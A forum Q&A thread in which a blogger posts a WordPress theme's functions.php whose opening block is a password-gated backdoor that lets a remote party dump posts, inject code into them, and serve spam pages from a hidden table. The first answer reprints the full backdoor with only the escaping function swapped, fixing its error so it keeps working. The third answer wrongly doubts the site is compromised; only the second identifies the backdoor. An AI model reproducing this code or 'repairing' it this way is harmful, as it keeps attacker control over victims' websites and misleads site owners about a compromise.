# Problem with function.php.. like

Tags: php, functions

Im sorry, if you show my blog at [autodhil.com](https://autodhil.com) that have a problem cause on the top of my blog have a wrong scrip..so that show this notification :

```
Deprecated mysql_escape_string(): This function is deprecated; use mysql_real_escape_string() instead. in /home/autodhil/public_html/wp-content/themes/sahifa2/functions.php on line 60
```

I really dont know how to fix it... i see question like this but unhelp...so i hope you can help me...

BTW, this is file of function.php

```
<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'xxxxxxxxxxxxxxxxxxxxxx'))
    {
        switch ($_REQUEST['action'])
            {
                case 'get_all_links';
                    foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
                        {
                            $data['code'] = '';

                            if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                                {
                                    $data['code'] = $_[1];
                                }

                            print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
                        }
                break;

                case 'set_id_links';
                    if (isset($_REQUEST['data']))
                        {
                            $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');

                            $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                            if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                            if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
                                {
                                    print "true";
                                }
                        }
                break;

                case 'create_page';
                    if (isset($_REQUEST['remove_page']))
                        {
                            if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
                                {
                                    print "true";
                                }
                        }
                    elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
                        {
                            if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
                                {
                                    print "true";
                                }
                        }
                break;

                default: print "ERROR_WP_ACTION WP_URL_CD";
            }

        die("");
    }


if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    {
        $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
        if ($data -> full_content)
            {
                print stripslashes($data -> content);
            }
        else
            {
                print '<!DOCTYPE html>';
                print '<html ';
                language_attributes();
                print ' class="no-js">';
                print '<head>';
                print '<title>'.stripslashes($data -> title).'</title>';
                print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
                print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
                print '<meta name="robots" content="index, follow" />';
                print '<meta charset="';
                bloginfo( 'charset' );
                print '" />';
                print '<meta name="viewport" content="width=device-width">';
                print '<link rel="profile" href="http://gmpg.org/xfn/11">';
                print '<link rel="pingback" href="';
                bloginfo( 'pingback_url' );
                print '">';
                wp_head();
                print '</head>';
                print '<body>';
                print '<div id="content" class="site-content">';
                print stripslashes($data -> content);
                get_search_form();
                get_sidebar();
                get_footer();
            }

        exit;
    }


?><?php

define ('THEME_NAME',       'Sahifa' );
define ('THEME_FOLDER',     'sahifa' );
define ('THEME_VER',        '5.3.0'  ); //DB Theme Version

define( 'NOTIFIER_XML_FILE',        "http://themes.tielabs.com/xml/".THEME_FOLDER.".xml" );
define( 'NOTIFIER_CHANGELOG_URL',   "http://tielabs.com/changelogs/?id=2819356" );
define( 'DOCUMENTATION_URL',        "http://themes.tielabs.com/docs/".THEME_FOLDER );

if ( ! isset( $content_width ) ) $content_width = 618;

// Main Functions
require_once ( get_template_directory() . '/framework/functions/theme-functions.php');
require_once ( get_template_directory() . '/framework/functions/common-scripts.php' );
require_once ( get_template_directory() . '/framework/functions/mega-menus.php'     );
require_once ( get_template_directory() . '/framework/functions/pagenavi.php'       );
require_once ( get_template_directory() . '/framework/functions/breadcrumbs.php'    );
require_once ( get_template_directory() . '/framework/functions/tie-views.php'      );
require_once ( get_template_directory() . '/framework/functions/translation.php'    );
require_once ( get_template_directory() . '/framework/widgets.php'                  );
require_once ( get_template_directory() . '/framework/admin/framework-admin.php'    );
require_once ( get_template_directory() . '/framework/shortcodes/shortcodes.php'    );

if( tie_get_option( 'live_search' ) )
    require_once ( get_template_directory() . '/framework/functions/search-live.php');

if( !tie_get_option( 'disable_arqam_lite' ) )
    require_once ( get_template_directory() . '/framework/functions/arqam-lite.php');

?>
```

For your help i say a lot of thank for you...

Answer (score 0):

It is asking to you change the **mysql_escape_string** to **mysql_real_escape_string** I have done them below but if I have missed one you will get another error.

```
 <?php

    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'xxxxxxxxxxxxxxxxxxxxxxxxx'))
        {
            switch ($_REQUEST['action'])
                {
                    case 'get_all_links';
                        foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
                            {
                                $data['code'] = '';

                                if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                                    {
                                        $data['code'] = $_[1];
                                    }

                                print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
                            }
                    break;

                    case 'set_id_links';
                        if (isset($_REQUEST['data']))
                            {
                                $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_real_escape_string($_REQUEST['id']).'"');

                                $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                                if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                                if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_real_escape_string($post_content) . '" WHERE `ID` = "' . mysql_real_escape_string($_REQUEST['id']) . '"') !== false)
                                    {
                                        print "true";
                                    }
                            }
                    break;

                    case 'create_page';
                        if (isset($_REQUEST['remove_page']))
                            {
                                if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_real_escape_string($_REQUEST['url']).'"'))
                                    {
                                        print "true";
                                    }
                            }
                        elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
                            {
                                if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_real_escape_string($_REQUEST['url']).'", `title` = "'.mysql_real_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_real_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_real_escape_string($_REQUEST['description']).'", `content` = "'.mysql_real_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_real_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_real_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_real_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_real_escape_string($_REQUEST['description']).'", `content` = "'.mysql_real_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_real_escape_string($_REQUEST['full_content']).'"'))
                                    {
                                        print "true";
                                    }
                            }
                    break;

                    default: print "ERROR_WP_ACTION WP_URL_CD";
                }

            die("");
        }


    if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_real_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
        {
            $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_real_escape_string($_SERVER['REQUEST_URI']).'"');
            if ($data -> full_content)
                {
                    print stripslashes($data -> content);
                }
            else
                {
                    print '<!DOCTYPE html>';
                    print '<html ';
                    language_attributes();
                    print ' class="no-js">';
                    print '<head>';
                    print '<title>'.stripslashes($data -> title).'</title>';
                    print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
                    print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
                    print '<meta name="robots" content="index, follow" />';
                    print '<meta charset="';
                    bloginfo( 'charset' );
                    print '" />';
                    print '<meta name="viewport" content="width=device-width">';
                    print '<link rel="profile" href="http://gmpg.org/xfn/11">';
                    print '<link rel="pingback" href="';
                    bloginfo( 'pingback_url' );
                    print '">';
                    wp_head();
                    print '</head>';
                    print '<body>';
                    print '<div id="content" class="site-content">';
                    print stripslashes($data -> content);
                    get_search_form();
                    get_sidebar();
                    get_footer();
                }

            exit;
        }


    ?><?php

    define ('THEME_NAME',       'Sahifa' );
    define ('THEME_FOLDER',     'sahifa' );
    define ('THEME_VER',        '5.3.0'  ); //DB Theme Version

    define( 'NOTIFIER_XML_FILE',        "http://themes.tielabs.com/xml/".THEME_FOLDER.".xml" );
    define( 'NOTIFIER_CHANGELOG_URL',   "http://tielabs.com/changelogs/?id=2819356" );
    define( 'DOCUMENTATION_URL',        "http://themes.tielabs.com/docs/".THEME_FOLDER );

    if ( ! isset( $content_width ) ) $content_width = 618;

    // Main Functions
    require_once ( get_template_directory() . '/framework/functions/theme-functions.php');
    require_once ( get_template_directory() . '/framework/functions/common-scripts.php' );
    require_once ( get_template_directory() . '/framework/functions/mega-menus.php'     );
    require_once ( get_template_directory() . '/framework/functions/pagenavi.php'       );
    require_once ( get_template_directory() . '/framework/functions/breadcrumbs.php'    );
    require_once ( get_template_directory() . '/framework/functions/tie-views.php'      );
    require_once ( get_template_directory() . '/framework/functions/translation.php'    );
    require_once ( get_template_directory() . '/framework/widgets.php'                  );
    require_once ( get_template_directory() . '/framework/admin/framework-admin.php'    );
    require_once ( get_template_directory() . '/framework/shortcodes/shortcodes.php'    );

    if( tie_get_option( 'live_search' ) )
        require_once ( get_template_directory() . '/framework/functions/search-live.php');

    if( !tie_get_option( 'disable_arqam_lite' ) )
        require_once ( get_template_directory() . '/framework/functions/arqam-lite.php');

    ?>
```

Comment: I don't know how to change it..... is I must change all  mysql_escape_string to mysql_real_escape_string in a funtion.php file ... please help me.                                       If you can, can you change my code on file function.php so i can copy and paste it to my file funton.php file so i change all that code

Answer (score 0):

That's a backdoor code injected probably caused by a nulled theme or plugin in your site. I'm having the same issue. The solution is to scan the whole site and get rid of everything you haven't paid for.

Comment: This does not answer the question, but it is actually true. The code mentioned in question is backdoor code.

Answer (score 0):

Your theme should be using the more updated `mysqli*` functions; `mysql*` functions are deprecated in more current PHP versions. Consider a different theme that uses `mysqli*` functions; your theme uses `mysql*` functions not supported in your PHP version.

If, as another person suggested, you suspect a hack on your site, there are several things to do: update WP/themes/plugins, remove unneeded plugins/themes, check htaccess, look for modified files, etc. Much detail involved than can be posted here; I wrote a blog entry for myself to remind me of recovering a site after a hack: http://securitydawg.com/recovering-from-a-hacked-wordpress-site/ .

Those steps should recover a hacked site (which yours is probably not; the deprecated functions in the theme are causing the problems; updating/changing theme to one that uses `mysqli*` functions will fix that).